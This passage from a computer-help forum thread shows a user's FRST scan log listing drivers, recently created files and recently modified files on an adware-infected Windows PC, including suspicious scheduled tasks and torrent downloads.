    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
    S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
    S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
  14. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2016-01-10 18:13 - 00000000 ____D C:\FRST
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
    2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
    2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
    2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
    2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
    2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
    2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
    2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
    2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
    2016-01-09 19:33 - 2016-01-10 18:13 - 00724154 _____ C:\WINDOWS\ntbtlog.txt
    2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
    2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
    2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
    2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
    2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
    2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
    2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
    2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
    2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
    2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
    2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
    2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
    2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
    2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
    2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
    2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
    2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
    2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
    2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
    2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
    2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
    2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
    2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
    2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
    2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
    2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
    2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
    2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
    2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
    2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
    2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
    2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
    2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
    2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
    2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
    2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
    2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
    2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
    2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
    2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
    2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
    2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
    2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
    2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
    2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
    2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
    2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
    2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
    2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
    2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
    2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
    2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
    2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
    2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
    2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
    2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
    2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
    2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
    2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
    2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
    2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
    2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
    2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
    2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
    2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
    2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
    2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
    2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
    2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
    2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
    2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
    2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
    2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
    2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
    2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
    2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
    2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
    2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
    2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
    2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
    2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
    2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
    2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
    2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
    2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
     
  15. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
    2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
    2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
    2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
    2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
    2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
    2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
    2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
    2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
    2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
    2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
    2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
    2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
    2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
    2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
    2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
    2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
    2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
    2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
    2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
    2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
    2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
    2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
    2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
    2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
